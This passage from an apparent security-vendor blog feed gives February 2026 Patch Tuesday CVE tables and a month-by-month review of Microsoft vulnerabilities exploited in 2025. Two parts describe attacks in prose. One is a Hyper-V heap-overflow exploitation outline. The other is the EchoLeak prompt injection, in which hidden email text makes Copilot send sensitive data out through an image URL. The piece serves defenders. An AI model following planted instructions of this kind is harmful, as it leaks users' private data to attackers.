of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr></tbody></table><h2>Zero-Day Vulnerabilities: Known Exploited</h2><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21519">CVE-2026-21519</a></td><td><p>Desktop Window Manager Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21514">CVE-2026-21514</a></td><td><p>Microsoft Word Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21513">CVE-2026-21513</a></td><td><p>MSHTML Framework Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21525">CVE-2026-21525</a></td><td><p>Windows Remote Access Connection Manager Denial of Service Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21533">CVE-2026-21533</a></td><td><p>Windows Remote Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21510">CVE-2026-21510</a></td><td><p>Windows Shell Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr></tbody></table><h2>Critical Remote Code Execution/Elevation of Privilege</h2><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21531">CVE-2026-21531</a></td><td><p>Azure SDK for Python Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-february-2026</link>
      <guid isPermaLink="false">blt2971dcd82d805b1b</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Wed, 11 Feb 2026 01:58:33 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday and the Enduring Challenge of Windows’ Backwards Compatibility]]></title>
      <description><![CDATA[<h2><span style='font-size: undefined;'>Introduction</span></h2><p><span style='font-size: undefined;'>If you received an email with the subject “I LOVE YOU” and an attachment called “LOVE-LETTER-FOR-YOU.TXT”, would you open it? Probably not, but back in the year 2000, plenty of people did exactly that. The internet learned a hard lesson about the disproportionate power available to a university dropout with some VBScript skills, and millions of ordinary people suffered the anguish of deleted family photos or even reputational damage as the worm propagated itself across their entire Outlook address book.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In the quarter century since ILOVEYOU rampaged across global networks, cybersecurity has moved from a niche topic to an “everyone” problem, and many users are wary of all sorts of threats. In recent years, the increasing ubiquity and urgency of AI adoption across the business landscape has attracted the attention of both security researchers and threat actors.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Of course, recency bias and shiny object fixation are real. Even as AI and automation continue to drive down time to known exploitation (TTKE), an attacker who abuses a traditional exploit chain to achieve SYSTEM privileges on a sensitive server still has the keys to the kingdom.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Wormable remote code execution (RCE) vulnerabilities remain rare, but well over half of the 25 exploited-in-the-wild zero-day vulnerabilities published by Microsoft during 2025 provided attackers with elevation of privilege opportunities on Windows assets. Some of those flaws are older than the iPhone, let alone ChatGPT.</span></p><p><span style='font-size: undefined;'>Microsoft's decades-long commitment to backwards compatibility creates a conveyor belt supply of </span>déjà<span style='font-size: undefined;'> vu vulnerabilities. Ultimately, the most pressing threats faced by defenders managing Microsoft estates remain essentially unchanged. Rather than a new wave of AI-related flaws, the chief danger stems from the towering tech debt within core Windows components.</span></p><h2 style="direction: ltr;">A whirlwind tour of exploited-in-the-wild Microsoft vulnerabilities (2025 edition)</h2><p style="direction: ltr;"><span style='font-size: undefined;'>If we really want to know which Microsoft vulnerabilities will provide the most value to attackers in 2026, we should ask a threat actor. Since that might prove difficult to arrange, we’ll do the next best thing: review vulnerabilities exploited in the wild during 2025.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd60359ab58adf73f/697a41e37e3e6c62115bd3a5/Chart-exploited-in-the-wild-eitw-microsoft-by-vulnerable-component-rapid7.png" alt="Chart-exploited-in-the-wild-eitw-microsoft-by-vulnerable-component-rapid7.png" caption="Chart 1: Exploited-in-the-wild Microsoft vulnerabilities, by vulnerable component" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Chart-exploited-in-the-wild-eitw-microsoft-by-vulnerable-component-rapid7.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd60359ab58adf73f/697a41e37e3e6c62115bd3a5/Chart-exploited-in-the-wild-eitw-microsoft-by-vulnerable-component-rapid7.png" data-sys-asset-uid="bltd60359ab58adf73f" data-sys-asset-filename="Chart-exploited-in-the-wild-eitw-microsoft-by-vulnerable-component-rapid7.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Chart 1: Exploited-in-the-wild Microsoft vulnerabilities, by vulnerable component" data-sys-asset-alt="Chart-exploited-in-the-wild-eitw-microsoft-by-vulnerable-component-rapid7.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Chart 1: Exploited-in-the-wild Microsoft vulnerabilities, by vulnerable component</figcaption></div></figure><h3><span style='color:rgb(67, 67, 67);'>January: The great escape</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The vast Microsoft ecosystem has something for everyone, whether customer or threat actor. </span><a href="https://www.rapid7.com/blog/post/2025/01/14/patch-tuesday-january-2025/"><span style='font-size: undefined;'>Patch Tuesday January 2025</span></a><span style='font-size: undefined;'> brought us a trio of exploited-in-the-wild Hyper-V kernel vulnerabilities. By September 2025, at least one plausible public proof-of-concept (PoC) for </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-21333"><span style='font-size: undefined;'>CVE-2025-21333</span></a><span style='font-size: undefined;'> was published by a vulnerability researcher who apparently shares a name with a Kazakhstani Olympic gymnast. The only safe assumption is that a well-resourced threat actor could develop a private exploit far in advance of that.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Starting from a child VM or Windows Sandbox, exploitation first requires setting out a banquet of benign requests for the hypervisor, delivered via the Hyper-V Virtualization Service Provider (VSP). The goal: mass-allocating objects to arrange large swathes of hypervisor memory in a predictable pattern (aka “</span><a href="https://blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf"><span style='font-size: undefined;'>heap feng shui</span></a><span style='font-size: undefined;'>”). Next, the attacker sends a malicious request with an oversized buffer, which an unpatched VSP merrily copies into kernel memory, overwriting the header of the adjacent object, whose relative position is now easily surmised. Once the kernel subsequently references the artfully corrupted sibling object, execution as SYSTEM jumps to a portion of memory where the attacker has planted shellcode to exfiltrate a token. The compromised hypervisor could be anything from a developer laptop running a malicious container all the way up to enterprise private cloud infrastructure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>So far, January 2025 is the only time that Microsoft has ever published vulnerabilities in the Hyper-V VSP. Generally speaking, a significant degree of sophistication is required to develop successful exploits of this nature. This goes double if the name of the game is stealth and stability, since a wave of unexplained </span><a href="https://support.microsoft.com/en-us/windows/troubleshooting-windows-unexpected-restarts-and-stop-code-errors-60b01860-58f2-be66-7516-5c45a66ae3c6"><span style='font-size: undefined;'>BSOD events</span></a><span style='font-size: undefined;'> on critical production infrastructure tends to attract blue team attention. Still, once a viable proof of concept hits the public internet, ransomware crews will fold it into their toolkits, and someone, somewhere, is either sitting on an unknown Hyper-V VSP exploit, or hard at work creating the next one.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>February: Socket to me</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>It’s hard to imagine a modern computer without storage or networking capabilities. In fact, it’s hard to imagine a computer from several decades ago without storage or networking. Microsoft is now middle-aged, and that means that buried deep within your shiny new PC are a variety of architectural decisions and logic paths born in the 1980s. If this sounds far-fetched, take a minute to find yourself a fully-patched Windows 11 25H2 machine, and then </span><a href="https://devblogs.microsoft.com/oldnewthing/20031022-00/?p=42073"><span style='font-size: undefined;'>try to rename any file or directory CON, NUL or PRN</span></a><span style='font-size: undefined;'>. I’ll wait.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Generally speaking, user-mode applications are prevented from wreaking havoc on the kernel through a careful separation of concerns. On Windows, when a user mode application wants to communicate over the network, it talks to WinSock, which in turn talks to the ancillary function driver (AFD), which sits on the kernel side, and coordinates with the kernel network drivers which handle the actual traffic. The AFD is a security boundary between user space and kernel space, and it must be universally accessible to local processes, because even a browser tab in a sandbox needs to make network calls. Any defect in the way AFD parses input from user space can thus provide a way to influence the kernel in unexpected ways. A number of advanced exploit development courses, including offerings from SANS and OffSec, cover AFD in detail.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4d9942db56f666ed/697a423f0ba5361e59de2ff9/chart-Windows-AFD-vulnerabilities-timeline-rapid7.png" alt="chart-Windows-AFD-vulnerabilities-timeline-rapid7.png" caption="Chart 2: Windows AFD vulnerabilities timeline, 2021-2025" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="chart-Windows-AFD-vulnerabilities-timeline-rapid7.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4d9942db56f666ed/697a423f0ba5361e59de2ff9/chart-Windows-AFD-vulnerabilities-timeline-rapid7.png" data-sys-asset-uid="blt4d9942db56f666ed" data-sys-asset-filename="chart-Windows-AFD-vulnerabilities-timeline-rapid7.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Chart 2: Windows AFD vulnerabilities timeline, 2021-2025" data-sys-asset-alt="chart-Windows-AFD-vulnerabilities-timeline-rapid7.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Chart 2: Windows AFD vulnerabilities timeline, 2021-2025</figcaption></div></figure><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>Patch Tuesday February 2025 brought us </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-21418"><span style='font-size: undefined;'>CVE-2025-21418</span></a><span style='font-size: undefined;'>, which Microsoft credited to Anonymous. We don’t know whether the unnamed tipster provided evidence of exploitation in the wild, or whether Microsoft threat hunters subsequently tracked down their own trail of suspicious bread crumbs, but notorious threat actors such as North Korea’s Lazarus are known to be enthusiastic students of AFD exploits. With several high-profile zero-day vulnerabilities emerging from AFD from late 2024 onwards, it tracks that Microsoft subsequently published and patched a cluster of AFD vulnerabilities in the latter half of 2025.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>March: File system shenanigans</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Any defenders who had enjoyed a quieter start to the year were rudely awakened by </span><a href="https://www.rapid7.com/blog/post/2025/03/11/patch-tuesday-march-2025/"><span style='font-size: undefined;'>Patch Tuesday March 2025</span></a><span style='font-size: undefined;'>, when six exploited-in-the-wild vulnerabilities all dropped at once. Exploitation of most of the zero-day vulnerabilities published in March starts with the user mounting a malicious Virtual Hard Disk (VHD) image or plugging in a malicious USB stick so that the attacker can exploit a weakness in a filesystem driver, including NTFS and FastFAT.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Remember that information security training which asked you to imagine finding a USB stick with an “IMPORTANT (CONFIDENTIAL)” label on the floor outside the office? The one which asked if you would A) plug the mystery stick into your work PC B) use your boss’ personal laptop in case the files are business critical C) try it in all the PCs in the office until someone asks you to stop or D) report it immediately to the security officer? This is why.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Meanwhile, the true villain of the month was almost certainly </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24983"><span style='font-size: undefined;'>CVE-2025-24983</span></a><span style='font-size: undefined;'>, a no-user-interaction-required elevation of privilege vulnerability in the Win32 kernel subsystem. At the time, we pondered why Windows 11 and Server 2019 onwards didn’t receive patches for what looks like a fairly severe vulnerability, but since Microsoft is gradually reimplementing portions of the kernel in memory-safe Rust, we can hope that the vulnerability simply doesn’t exist in modern Windows.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>April: Common Log File System driver vulns are quite common</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>If anyone ever corners you at a party and talks at length about the Ancillary Function Driver as a bounteous source of elevation of privilege vulnerabilities, you will probably have to concede that they are technically correct. While your options include “doing a lap” and then climbing out of the bathroom window, the power move here is to hold your ground, and point to the Common Log File System driver as a far richer vein of exploitable goodness.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of </span><a href="https://www.rapid7.com/blog/post/2025/04/08/patch-tuesday-april-2025/"><span style='font-size: undefined;'>Patch Tuesday April 2025</span></a><span style='font-size: undefined;'>, CLFS boasts almost twice the number of total vulnerabilities over the past five years vs. AFD, and more than double the number of known-exploited zero-day vulnerabilities. It really is the gift which keeps on giving.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42502a936d6dd60c/697a4298da7906dd20722129/chart-windows-CLFS-vulnerabilities-timeline-rapid7.png" alt="chart-windows-CLFS-vulnerabilities-timeline-rapid7.png" caption="Windows CLFS vulnerabilities timeline, 2021-2025" height="583" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="chart-windows-CLFS-vulnerabilities-timeline-rapid7.png" width="1553" max-width="1553" max-height="583" style="max-width: 1553px; width: 1553px; max-height: 583px; height: 583px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42502a936d6dd60c/697a4298da7906dd20722129/chart-windows-CLFS-vulnerabilities-timeline-rapid7.png" data-sys-asset-uid="blt42502a936d6dd60c" data-sys-asset-filename="chart-windows-CLFS-vulnerabilities-timeline-rapid7.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Windows CLFS vulnerabilities timeline, 2021-2025" data-sys-asset-alt="chart-windows-CLFS-vulnerabilities-timeline-rapid7.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Windows CLFS vulnerabilities timeline, 2021-2025</figcaption></div></figure><p>⠀</p><p><span style='font-size: undefined;'>It makes sense that something like the Ancillary Function Driver lives in kernel space. After all, something has to sit inside the perimeter to marshall all those network requests from dozens of Chrome tabs. What about the Common Log File System driver though?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It would be tempting to imagine that anything which simply handles log files shouldn’t need direct kernel access at all. When exploring this concept, it’s useful to understand that not only was CLFS designed a long time ago, when high performance in user mode was harder to achieve than it is today, but also that CLFS is much more than simply a means to interact with log files. CLFS is the home of still-essential building blocks like Transactional NTFS (TxF), first introduced almost 25 years ago in Windows Vista, which provides a means for applications to guarantee the integrity of data on disk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the past several years, Microsoft has </span><a href="https://learn.microsoft.com/en-us/windows/win32/fileio/transactional-ntfs-portal"><span style='font-size: undefined;'>strongly recommended</span></a><span style='font-size: undefined;'> that developers avoid the use of TxF, and while Microsoft is gradually providing modern alternatives to TxF functionality, essential Windows functions such as Windows Update still rely on it to manage critical file integrity. Moreover, CLFS is more than just TxF, and is so tightly integrated into Windows that it’s here to stay for the foreseeable future.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>May: The month of expectation, wishes, hope, and classic Windows zero-days [1]</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>A few days after </span><a href="https://www.rapid7.com/blog/post/2025/05/13/patch-tuesday-may-2025/"><span style='font-size: undefined;'>Patch Tuesday May 2025</span></a><span style='font-size: undefined;'>, Satya Nadella took to the stage at Microsoft Build 2025 to pitch his vision of the open agentic web, although exactly who this version of the future would be open to remains an open question, like: What if a cloud email service was vulnerable to a zero-click prompt injection attack, but could also now buy things with your credit card?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While critical reception for the open agentic web has been mixed, threat actors will be glad of the new attack surface. Meanwhile, defenders worried about in-the-wild exploitation were hard at work patching some more frequent fliers, including another pair of CLFS vulnerabilities and an MSHTML/Trident arbitrary code execution bug. That last one will be familiar to regular Patch Tuesday watchers, but it might come as a surprise to anyone who thought Internet Explorer had gone to live on a nice farm upstate years ago.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The Ancillary Function Driver made another appearance, although it couldn’t quite summon the same main character energy this time around. The </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32709"><span style='font-size: undefined;'>May 2025 episode</span></a><span style='font-size: undefined;'> of “AFD vulns exploited in the wild” offered elevation to Administrator, rather than SYSTEM, and a lower exploit code maturity rating. We can always be grateful for small mercies.</span></p><p><em>[1]: With apologies to Emily Brontë.</em></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>June: I’m afraid I can’t let you do that, WebDAV</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Windows archeologists and internet users of a certain age may remember WebDAV, a </span><a href="https://datatracker.ietf.org/doc/html/rfc2291"><span style='font-size: undefined;'>standard</span></a><span style='font-size: undefined;'> originally dreamed up to support interactivity on the web. It was employed by versions of Microsoft Exchange up to and including 2010 to handle interactions with mailboxes and public folders.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Surprising no-one, Windows still </span><a href="https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features"><span style='font-size: undefined;'>more or less</span></a><span style='font-size: undefined;'> supports WebDAV, and it was only a matter of time before that turned out to be a bit of a problem, in the form of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-33053"><span style='font-size: undefined;'>CVE-2025-33053</span></a><span style='font-size: undefined;'> published as part of </span><a href="https://www.rapid7.com/blog/post/2025/06/10/patch-tuesday-june-2025/"><span style='font-size: undefined;'>Patch Tuesday June 2025</span></a><span style='font-size: undefined;'>. Microsoft acknowledged Check Point Research (CPR) on the advisory; CPR in turn attributes exploitation to an APT (Advanced Persistent Threat), which they track as the objectively cool-sounding </span><a href="https://attack.mitre.org/groups/G0038/"><span style='font-size: undefined;'>Stealth Falcon</span></a><span style='font-size: undefined;'>, an established threat actor with a long-running interest in governments and government-adjacent entities across the Middle East and beyond.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>June 2025 also saw the publication of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32711"><span style='font-size: undefined;'>CVE-2025-32711</span></a><span style='font-size: undefined;'>, a critical information disclosure vulnerability in Microsoft 365 Copilot. Microsoft is not aware of exploitation in the wild. The researchers named it EchoLeak, </span><a href="https://www.arxiv.org/pdf/2509.10540"><span style='font-size: undefined;'>describing</span></a><span style='font-size: undefined;'> it as “the first real-world zero-click prompt injection exploit in a production LLM system,” although </span><a href="https://arxiv.org/pdf/2302.12173"><span style='font-size: undefined;'>other researchers arguably got there first</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>EchoLeak relies on hidden white-text-on-white-background instructions in an email, which are then ingested into the LLM via RAG (Retrieval-Augmented Generation) when the user asks an entirely pedestrian question (e.g. “Summarize my emails from the past two days”) which requires Copilot to scan the inbox. The malicious instructions have two parts: First, dig up some juicy info, and then retrieve an image from an attacker-controlled server with the sensitive data exfiltrated as a URL parameter.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>EchoLeak circumvented Copilot’s Content Security Policy by making the request via a trusted Microsoft service: a now-patched Teams image preview proxy. History suggests that attackers will find other ways out of the walled garden. The Microsoft advisory makes a virtue of minimalism by providing almost no information about the nature of the vulnerability, although Microsoft is surely to be commended for </span><a href="https://www.microsoft.com/en-us/msrc/blog/2024/06/toward-greater-transparency-unveiling-cloud-service-cves"><span style='font-size: undefined;'>assigning CVEs for cloud service vulnerabilities</span></a><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>July: The call is coming from inside the intranet</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>When </span><a href="https://www.rapid7.com/blog/post/patch-tuesday-july-2025/"><span style='font-size: undefined;'>Patch Tuesday July 2025</span></a><span style='font-size: undefined;'> came and went without a single exploited-in-the-wild vulnerability published, many people may have breathed a sigh of relief. Possibly this was a valid move, at least for anyone not responsible for a SharePoint instance.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>SharePoint defenders will remember July as </span><a href="https://www.rapid7.com/research/report/cve-2025-53770/"><span style='font-size: undefined;'>the month of ToolShell</span></a><span style='font-size: undefined;'>, an actively-exploited vulnerability chain in SharePoint which Microsoft published out of band ten days after Patch Tuesday. Out of band patches for Microsoft flagship products are rare, since they inevitably cause downstream disruption. Once </span><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/"><span style='font-size: undefined;'>MSTIC publicly attributes exploitation to two Chinese nation-state actors</span></a><span style='font-size: undefined;'>, that line has been crossed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The vulnerability described by the out-of-band </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770"><span style='font-size: undefined;'>CVE-2025-53770</span></a><span style='font-size: undefined;'> turned out to be a bypass for the patch introduced by </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704"><span style='font-size: undefined;'>CVE-2025-49704</span></a><span style='font-size: undefined;'> earlier in the month, which was itself a response to a successful Pwn2Own Berlin entry from May.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>August: It’s almost too quiet</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft was not aware of exploitation in the wild for any of the vulnerabilities published as part of </span><a href="https://www.rapid7.com/blog/post/patch-tuesday-august-2025/"><span style='font-size: undefined;'>Patch Tuesday August 2025</span></a><span style='font-size: undefined;'>. SharePoint admins may have been dealing with the fallout from last month’s ToolShell and bracing for a possible repeat, but August might otherwise have made for an eerily quiet month. Still, the Windows implementation of Kerberos managed to cough up a </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>publicly-disclosed elevate-to-domain-admin vulnerability</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Separately, we learned that simply </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50165"><span style='font-size: undefined;'>saving a JPEG</span></a><span style='font-size: undefined;'> could be enough to hand an attacker RCE capabilities, because the internet never sleeps. If the vulnerable codepath had been within JPEG decoding, rather than encoding, this one could have been the biggest vuln of the year.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>September: Almost too quiet, part 2</span></h3><p style="direction: ltr;"><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-september-2025/"><span style='font-size: undefined;'>Patch Tuesday September 2025</span></a><span style='font-size: undefined;'> was the second month in a row with no known-exploited vulnerabilities, but vuln spotters will appreciate that this month saw the publication of a fairly rare beast: a Microsoft vulnerability with a perfect(?) CVSS v3 base score of 10.0, albeit a cloud service vulnerability discovered by Microsoft and patched prior to publication. No customer action required, but also no customer verification possible, and since </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54914"><span style='font-size: undefined;'>the impacted cloud service was Azure Networking</span></a><span style='font-size: undefined;'>, the blast radius could have been stupendous.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>October: Dial M for exploitation</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>These days, there are plenty of seasoned IT professionals who don’t even know what a dialup modem negotiation song sounds like, simply because broadband has been around for that long. For younger readers, “broadband” is what we used to call “internet fast enough that you don’t have to wait to download a single email attachment”.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By this point, we all know where this is going: Windows still ships with modem capabilities well beyond their sell-by date, and someone found a good old </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24990"><span style='font-size: undefined;'>elevation of privilege vulnerability</span></a><span style='font-size: undefined;'>. The vulnerable fax modem driver was developed almost 30 years ago by a long-defunct third party, and Microsoft has now taken uncharacteristically bold action by removing it from Windows altogether, perhaps recognizing that traditional landlines are no longer available at all in many places. Are there other fax modem drivers still lurking in Windows? </span><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-january-2026/"><span style='font-size: undefined;'>You betcha</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025/"><span style='font-size: undefined;'>Patch Tuesday October 2025</span></a><span style='font-size: undefined;'> also marked the end of Windows 10, unless you count the cash-for-patches </span><a href="https://learn.microsoft.com/en-us/windows/whats-new/extended-security-updates"><span style='font-size: undefined;'>Extended Security Updates (ESU) program</span></a><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>November: Kernel vuln? Popcorn time</span></h3><p style="direction: ltr;"><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-november-2025/"><span style='font-size: undefined;'>Patch Tuesday November 2025</span></a><span style='font-size: undefined;'> included an exploited-in-the-wild vulnerability in the Windows kernel itself. While the advisory was light with details, exploitation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62215"><span style='font-size: undefined;'>CVE-2025-62215</span></a><span style='font-size: undefined;'> led to elevation to SYSTEM, presumably via a complex bit of memory management three card monte. Those kernel Rust rewrites can’t come soon enough.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>December: A cloud of suspicion</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>After a year filled with variations of the same old exploitable vulns, it might almost be refreshing to consider the altogether more modern-sounding exploited-in-the-wild vulnerability published on </span><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-december-2025/"><span style='font-size: undefined;'>Patch Tuesday December 2025</span></a><span style='font-size: undefined;'>. </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62221"><span style='font-size: undefined;'>CVE-2025-62221</span></a><span style='font-size: undefined;'> describes an elevation of privilege vulnerability in the Windows Cloud Files Mini Filter Driver.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On Windows, a file or directory can contain a </span><a href="https://learn.microsoft.com/en-us/windows/win32/fileio/reparse-points"><span style='font-size: undefined;'>reparse point</span></a><span style='font-size: undefined;'>, a collection of user-controlled metadata designed to be interpreted by a file filter driver. An example would be a file which appears present in a local folder, but where the actual contents of the file are stored remotely on OneDrive. The user double-clicks on the file, the file filter driver intercepts the request, reads the metadata, and calls out to OneDrive, while the user gets the experience of opening the file as though it had been stored locally. Of course, the file filter driver needs kernel access to perform its duties. Find an exploitable flaw in the way a file filter driver parses the metadata, and you can trick it into doing things like overwriting protected system files.</span></p><h2>What’s next?</h2><h4><span style='color:rgb(67, 67, 67);'>Everything gets faster, including bad things</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>As Rapid7 has observed repeatedly, time to known exploitation for widely-exploited vulnerabilities has been shrinking year-on-year. By 2022, the </span><a href="https://www.rapid7.com/about/press-releases/rapid7-vulnerability-intelligence-report-shows-attackers-developing-and-deploying-exploits-faster-than-ever/"><span style='font-size: undefined;'>time to exploitation after public disclosure for some of the most notable security vulnerabilities</span></a><span style='font-size: undefined;'> was as low as 24 hours. With exploit development now widely augmented by automation and AI, there is every reason to suppose that the window will continue to shrink further.</span></p><h4><span style='color:rgb(67, 67, 67);'>Threat actors will stay best friends with elevation of privilege vulns</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>A wormable unauthenticated RCE vulnerability remains the scariest scenario, but mercifully these are historically rare. The one-two combo of minimally-privileged initial access and local privilege escalation presents a much more clear and present danger in most modern threat models. Sure, you could parachute in from a helicopter, abseil down from the roof, and crawl through an air vent to steal the diamond, but why bother when you could simply tailgate a delivery driver, and then distract a maintenance worker while you swipe their all-access keycard?</span></p><h4><span style='color:rgb(67, 67, 67);'>AI is here to stay, but tech debt is the real killer</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>In 2026, Microsoft will regularly publish AI-related vulnerabilities, and AI-wielding threat actors will hammer Microsoft’s cloud services. Blue teams managing significant Windows estates will still spend more time worrying about on-prem vulnerabilities where the root cause is a classic software engineering snafu.</span></p><h3><span style='font-size: undefined;'>Final thoughts</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Arguably the biggest takeaway from 2025 is that the more things change, the more they stay the same. The scariest Microsoft vulnerabilities tend to emerge from the same few familiar places: core Windows components with codebases older than many of the humans who rely on them.</span></p><p style="direction: ltr;"><span style='font-size: 